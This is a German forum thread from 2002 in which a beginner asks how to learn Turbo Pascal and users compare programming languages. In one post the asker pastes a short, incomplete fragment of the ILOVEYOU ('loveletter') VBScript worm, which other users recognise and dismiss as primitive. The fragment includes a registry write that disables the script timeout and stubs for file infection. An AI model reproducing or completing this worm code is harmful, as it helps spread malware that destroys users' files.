.
|
|
| Autor | Beitrag |
|---|---|
|
000 10.03.2002, 14:19 -X- |
So ich hab mal ne Frage (Nicht schlagen). Nen freund von mir hat mir borland Pascal gegeben er sagt das is total easy gut und schoen fuer mich aber nicht wo bekommt man Hilfe wie man das proggen damit leichter erlernen kann?? Es nuetzt mir ja nichts die ganze zeit irgend welchen scheiss einzutippen ich muss ja wissen wie man ein programm beginnt, beendet usw also bitte helft mir. Wer kämpft kann verlieren,wer nicht hat bereits verloren.
|
|
Profil || Suche |
|
001 10.03.2002, 14:25 PsychoSven |
http://www.google.de/search?q=pascal+tutorials&hl=de&btnG=Google-Suche&meta=lr%3Dlang_de Aber aus eigener Erfahrung kann ich dir sagen: Pascal ist scheisse. --psychosven - float like a butterfly, sting like a bee. |
|
Profil || Suche |
|
002 10.03.2002, 14:26 mani |
nö, isses eigentlich nich :) www.leprau.de gibts was -- |
|
Profil || Suche |
|
003 10.03.2002, 14:29 -X- |
Danke an euch ich hoffe ich werde es irgend wann in diesem leben sogar koennen :) ! Welche sprachen habt ihr den drauf??? --Wer kämpft kann verlieren,wer nicht hat bereits verloren.
|
|
Profil || Suche |
|
004 10.03.2002, 14:33 apfelkorn |
mh... basic, pascal, logo, c, c++, vb, mhh... html, php, javascript, css (wenn du das programmiersprache nennen willst. übrigens zeigt dein beitrag, das du kein dau bist, sondern das du dich dafür interessierst und bereit bist, darin zeit zu investieren. man sollte mal ein wenig mehr in programmiersprachenanfänger investieren. :) -- |
|
Profil || Suche |
|
005 10.03.2002, 14:46 mani |
hmmm logo _ist_ KEINE programmiersprache, das is nen verunstaltetes zeichenprogramm... :) -- |
|
Profil || Suche |
|
006 10.03.2002, 14:48 -X- |
Wie lange habt ihr den fuer eine sprache gelernt bis ihr sie konntet??? 2, 3, 4 Jahre? --Wer kämpft kann verlieren,wer nicht hat bereits verloren.
|
|
Profil || Suche |
|
007 10.03.2002, 14:51 mani |
bis man eine sprache einigermaßen kann, dauert es erfahrungsgemäß nicht lange, 1-2 wochen vielleicht; bis du aber die gewalt über alle befehle hast vielleicht 5-10 Jahre, einige werden auch nie fertig :) (eigentlich wird keiner fertig) --Dieser Beitrag wurde am 10.03.2002 um 14:52 von mani bearbeitet. |
|
Profil || Suche |
|
008 10.03.2002, 18:23 faer |
Benutze lieber eine andere Programmiersprache, da Pascal ein bisschen veraltet ist. C++ ist eigentlich eine ganz gute Programmiersprache. Aber im Prinzip ist es egal mit welcher Programmiersprache du Programmieren lenst. Was beim Programmieren naehmlich am wichtigsten ist, ist das Design deines Programms und das ist Sprachenunabhaengig --Miss Mapple a GNU Half-Life Map Editor |
|
Profil || Suche |
|
009 10.03.2002, 19:00 Onkel Dittmeyer |
Also zumindest find ich den Source von TP WESENTLICH übersichtlicher als von C++ aber is geschmackssache. Ich würde dir empfehlen mit TP anzufangen is realtiv easy -- |
|
Profil || Suche |
|
010 10.03.2002, 19:07 apfelkorn |
ich persönlich würde allerdings doch den einstieg mit pascal empfehlen. Es mag zwar ein wenig antiquiert sein, aber es ist trotzdem eine wunderbare sprache, um programmieren überhaupt erst zu lernen. Wenn du eine Weile deinen Spaß mit Pascal gehabt hast, kannst du ja auch Umsteigen auf C etc. C ist und bleibt halt eine schwere Sprache (genauso wie Deutsch =) ) -- |
|
Profil || Suche |
|
011 10.03.2002, 20:40 -X- |
WOZU gehoert dies? rem barok -loveletter(vbe) <i hate go to school> On Error Resume Next eq="" main() sub main() On Error Resume Next rr=wscr.RegRead("HKEY_CURRENT_USER\Software?Microsoft\Windows Scripting Host\Settings\Timeout") wscr.RegWrite"HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout", 0, "REG_DWORD" Set dirwin = fso.GetSpecialFolder(0) sub regruns() sub listadriv sub infectfiles(folderspec) Wer kämpft kann verlieren,wer nicht hat bereits verloren.
|
|
Profil || Suche |
|
012 10.03.2002, 20:45 Tron |
den ersten zeilen nach zu urteilen ist das 'I LOVE YOU' 'KEINE PANIK' - aus der Triologie in fuenf Baenden von Douglas Adams 'FÜR DEINN FERD' - aus 'Gevatter Tod' von Terry Pratchett |
|
Profil || Suche |
|
013 10.03.2002, 21:29 -X- |
Ach scheisse euch kann man ja auch fragen was man will ihr wisst alles :( ! Haette wohl besser das "-loveletter(vbe)" vertuschen sollen :) ! --Wer kämpft kann verlieren,wer nicht hat bereits verloren.
|
|
Profil || Suche |
|
014 10.03.2002, 22:56 apfelkorn |
naja, da war unten aber noch ein LOVE-LETTER-FOR-YOU.TXT.vbs |
|
Profil || Suche |
|
015 10.03.2002, 23:06 Tron |
ehrlich gesagt, hab ich's an dem '<i hate go to school>' erkannt (; --'KEINE PANIK' - aus der Triologie in fuenf Baenden von Douglas Adams 'FÜR DEINN FERD' - aus 'Gevatter Tod' von Terry Pratchett |
|
Profil || Suche |
|
016 11.03.2002, 14:15 Joker |
*bittenichtschlagenschildhervorkram* ich bin jetzt nicht irgendwie der OBER-DAU oder so. ich kann sowohl hmtl als auch ein bisschen css... 1 - 2 programmiersprachen kann ich auch... -=[ Aigu.ch ]=- |
|
Profil || Suche |
|
017 11.03.2002, 14:32 Onkel Dittmeyer |
Es ist ne Makrosprache sagen wirs mal so. |
|
Profil || Suche |
|
018 11.03.2002, 14:33 Manitu |
nöö Joker, html und CSS sind garantiert keine Programmiersprachen. @-X-: Ich persönlich kann von TP nur schwärmen, der Code ist übersichtlicher als jede andere Sprache. (voraussetzung man veranstaltet nicht ein riesen chaos) ich empfehle dir mit TP anzufangen, auch wenns veraltet ist. Besonders wenn du später mal vor hast, auf eine höhere Sprache umzusteigen (C++, Java, PHP etc.) so ist Pascal diesen Sprachen sehr viel näher als z.B. Basic. Tutorials im Netz gibt es genug. --MfG Manitu
Dieser Beitrag wurde am 11.03.2002 um 14:41 von Manitu bearbeitet. |
|
Profil || Suche |
|
019 11.03.2002, 19:14 Crack-Tom |
TP lernen wir in der Schule, aber noch vereinfachter als es ohnehin schon ist. Mit einer speziellen UNITin der man einem roboter im Quellcode befehle gibt. Heiß NIKI. Diese freeware-compilernamen verwirren mich; MingW32, DEVCPP, JPEG.....
|
|
Profil || Suche |
|
020 11.03.2002, 20:05 Tron |
ahhh... NIKI *schaumvordemmundbekomm* 'KEINE PANIK' - aus der Triologie in fuenf Baenden von Douglas Adams 'FÜR DEINN FERD' - aus 'Gevatter Tod' von Terry Pratchett |
|
Profil || Suche |
|
021 12.03.2002, 09:23 apfelkorn |
ich hab ja auch was in klammern dahinter geschrieben und vor die makrosprachen ein mh... ;) TurboPascal ist auch wirklich gut und leicht verständlich, es eignet sich besonders gut für neu-einsteiger. c ist da schon abstrakter, wenn du damit neu anfängst bist du am ende total verwirrt. Aber die Steuerelemente sind in beiden Sprachen an sich gleich, und so lernt man schon sehr viel, auch für später. Allerdings von Delphi kann ich nicht so gut sprechen. Mein Freund hat damit mal ne Zeitlang seine Spiele geschrieben, aber er fand, dass delphi ihn zusehr einenge und er da nicht wirklich was grosses machen kann, weil es sozusagen ihm alles schoneinmal vorgekaut worden ist. Wenn du mit tp fertig bist, kannst du entscheiden, ob du noch mehr übung willst. wenn ja, mach mit basic weiter. Es ist ganz nützlich wenn man weiß wie es geht, und eine programmiersprache mehr auf dem einstellungsgesuch angeben kannst. aufjeden fall solltest du dann weiter in c bzw. c++ machen. Dafür braucht man halt ein bisschen länger um das ansatzweise zu erreichen, was große softwarefirmen machen, aber dafür ist das erfolgserlebnis größer und c bzw. c++ ist allgemein universeller. p.s. delphi ist auch nur in c geschrieben ;) -- |
|
Profil || Suche |
|
022 14.03.2002, 18:36 Pa |
als ich angefangen hab zu proggen hab ich VB gelernt, _______________ |
|
Profil || Suche |
|
023 15.03.2002, 09:19 TheTinySteini |
Naja... die allermeisten hier haben wohl ihr Programmiererleben mit nem Basic-Interpreter begonnen. Ob jetzt gwbasic oder qbasic, jedenfalls basic. Gut, ich weiß, Prefect nicht. Aber bei mir war es so und ich weiß es von einigen anderen. Und so schlecht ist Basic dann doch nicht. Immerhin lernt man dabei das logische Denken, das Denken in computerverarbeitbaren Befehlen. Und darum geht's doch hauptsächlich. TheTinySteini |
|
Profil || Suche |
|
024 15.03.2002, 09:38 CY4N1D3 |
der loveletter virus ist so verdammt primitiv ! war garantiert ein anfänger ! --ob nun delphi, c oder java. kein programm lässt sich mit allen 3en gleichschnell entwickeln. |
|
Profil || Suche |
|